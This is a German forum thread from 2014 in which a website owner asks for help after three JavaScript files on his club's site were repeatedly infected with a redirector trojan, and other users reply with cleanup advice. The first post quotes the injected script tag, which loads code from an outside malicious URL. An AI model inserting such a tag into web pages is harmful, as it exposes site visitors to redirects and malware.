JS Dateien Befall mit Trojan:JS/Redirector.NL

norbert3 schrieb am 16.05.2014 um 12:25 Uhr

Hallo ich stelle heute das erste mal eine Frage und hoffe auf Antwort.

Bereits zum 5. Mal wurden drei Dateien auf:
http://www.oldtimerfreunde-karlshuld.de/
mit Schadcode versehen.

Die Dateien heißen: highslide.js, png.js  und roe.js

Folgenden Schnipsel hat Google gefunden und die Seite im CROME gesperrt:
<script type="text/javascript" src="http://amry.net/7BZrJNdf.php?id=">
Ich habe die Dateien schreibgeschützt.
Hat auch nichts geholfen.

Server:
Linux hosting-stefan 2.6.26-2-xen-686 #1 SMP Wed Sep 21 09:56:47 UTC 2011 i686
PHP Version 5.2.6-1+lenny16
Apache 2.0 Handler

Ich bin mit meinem Latein am Ende

Kommentare

marboe schrieb am 16.05.2014 um 14:16 Uhr

Hallo,wenn dein PC sauber ist, dann sind es auch die mit dem WD erstellten Seiten. Du hast also ein Problem auf deinem PC oder dein Server ist gehackt. Da hilft nur eine ausführliche testung mit entsprechenden Antivirenprogrammen. Was den Schutz deines Servers angeht, googelst du am besten mal mit dem Zusatz deines Hostanbieternamens. Von dort solltest du auch Hilfe bekommen. Aber ich würde erst mal auf dem eigenen PC suchen... Und nach Bereinigung unbedingt alle Passwörter ändern!! Gruß Martina

norbert3 schrieb am 17.05.2014 um 19:14 Uhr

Die Dateien auf meinem Rechner sind 100% Virenfrei.

Der Befall findet auf dem WEB-Server statt. der Provider meldete:
-------------------------------

In der Regel sind Fehler/Anfälligkeiten in den Skripten schuld. Die gekaperten Skripte müssen entfernt, die Funktionen mit offenen Sicherheitslücken aktualisiert werden.

___________________

Demzufolge haben die Scripte des WD ein Sicherheitsrisiko.

marboe schrieb am 18.05.2014 um 06:41 Uhr

Hallo Norbert, wenn das richtig wäre, würde ich aber hier im Forum viel mehr Einträge in diese Richtung erwarten. Du bist, glaube ich, der Erste, der mit dieser Version sowas meldet. Das der Provider es sich hier einfach macht, ist nicht überraschend. Gruß Martina